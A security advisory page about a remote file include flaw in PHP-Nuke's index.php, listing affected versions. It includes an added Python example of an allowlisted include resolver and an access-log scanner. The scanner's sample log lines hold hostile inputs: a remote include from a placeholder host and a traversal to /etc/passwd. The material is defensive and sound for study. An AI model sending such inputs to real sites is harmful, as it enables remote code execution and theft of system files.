J-Security Center

Title: PHPNuke Remote Arbitrary File Include Vulnerability

Severity: HIGH

Description:

PHP-Nuke is a website creation and maintenance tool.

The 'index.php' script has a feature that allows users to specify a file to be included. While attempts have been made to prevent this feature from being abused to execute arbitrary files already present on the host running PHP-Nuke, no such effort has been made to prevent it from being used to include files located on a remote server. The issue is due to insufficient input validation in the vulnerable script: arbitrary code in the attacker's included file may be executed.

As one consequence of this issue, a remote attacker can cause commands to be executed via the shell on a host running a vulnerable version of PHP-Nuke. Commands are executed with the privileges of the web server process and may result in the attacker gaining local access.

It is not known whether this vulnerability affects PostNuke, though the possibility exists.
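The defensive counterpart to the behaviour described above, as an added example that is not part of this advisory or of PHP-Nuke's own code: a Python model of an allowlisted include resolver (the kind of check a maintainer would apply in place of including whatever name the request supplies) together with a scanner that flags remote-include and traversal attempts in web-server access log lines. The query parameter name `file`, the module names, the log format and all addresses are assumptions constructed for the example; PHP-Nuke's real parameter name is not given in the advisory.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Hypothetical allowlist of module names the site actually ships. A real
# deployment would derive this from the installed modules, never from input.
ALLOWED_MODULES = {"News", "Search", "Topics"}

# Hypothetical name of the include parameter; the advisory does not name it.
INCLUDE_PARAM = "file"

SCHEME_RE = re.compile(r"^[a-zA-Z][a-zA-Z0-9+.-]*://")   # http://, ftp://, php://, ...


def is_remote_or_traversal(value: str) -> bool:
    """True if the value names a remote resource or escapes the module directory."""
    v = unquote(value)                    # catch double-encoded values as well
    if SCHEME_RE.match(v):
        return True                       # remote include: the advisory's core issue
    if "\x00" in v or ".." in v or "/" in v or "\\" in v:
        return True                       # local arbitrary file: path or NUL tricks
    return False


def resolve_include(value: str):
    """Map a requested module name to its local path, or None if not allowed.

    Only an exact allowlist match is honoured, so a scheme, a path or anything
    not installed is rejected before any include happens.
    """
    if is_remote_or_traversal(value):
        return None
    if value not in ALLOWED_MODULES:
        return None
    return f"modules/{value}/index.php"


# Common Log Format: ip ident user [ts] "method target proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) '
)


def scan_access_log(lines):
    """Return (client_ip, offending_value) for requests abusing the include parameter."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith("index.php"):
            continue
        params = parse_qs(parts.query, keep_blank_values=True)
        for value in params.get(INCLUDE_PARAM, []):
            if is_remote_or_traversal(value):
                hits.append((m.group("ip"), value))
    return hits


# Constructed sample log lines (documentation addresses only).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Oct/2000:13:55:36 -0700] "GET /index.php?file=News HTTP/1.0" 200 2326',
    '192.0.2.77 - - [10/Oct/2000:13:57:01 -0700] "GET /index.php?file=http://203.0.113.5/x.txt HTTP/1.0" 200 512',
    '192.0.2.77 - - [10/Oct/2000:13:57:09 -0700] "GET /index.php?file=..%2F..%2Fetc%2Fpasswd HTTP/1.0" 200 0',
    '192.0.2.12 - - [10/Oct/2000:13:58:00 -0700] "GET /images/logo.gif HTTP/1.0" 200 1024',
]

if __name__ == "__main__":
    for ip, value in scan_access_log(SAMPLE_LOG):
        print(f"suspicious include from {ip}: {value!r}")
    print(resolve_include("News"), resolve_include("http://203.0.113.5/x.txt"))
```

The resolver deliberately refuses anything that is not an exact allowlist entry rather than trying to strip schemes or dots out of the input; the scanner is only a triage aid, since a 200 response on such a request says nothing about whether the include actually succeeded.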

Affected Products:

  • Francisco Burzi PHP-Nuke 1.0.0
  • Francisco Burzi PHP-Nuke 2.5.0
  • Francisco Burzi PHP-Nuke 3.0.0
  • Francisco Burzi PHP-Nuke 4.0.0
  • Francisco Burzi PHP-Nuke 4.3.0
  • Francisco Burzi PHP-Nuke 4.4.0
  • Francisco Burzi PHP-Nuke 4.4.1a
  • Francisco Burzi PHP-Nuke 5.0.0
  • Francisco Burzi PHP-Nuke 5.0.1
  • Francisco Burzi PHP-Nuke 5.1.0
  • Francisco Burzi PHP-Nuke 5.2.0
  • Francisco Burzi PHP-Nuke 5.2.0a
  • Francisco Burzi PHP-Nuke 5.3.1

Juniper Networks provides this content via a wide variety of sources and production methods. If notified of errors or omissions in the content of this page, Juniper Networks, at its discretion, will modify or remove the page or leave the content as is, depending on various factors including but not limited to the reputation and authority of the party providing the notification. Please use the contact information displayed elsewhere on this page to report any errors or omissions regarding the content on this page.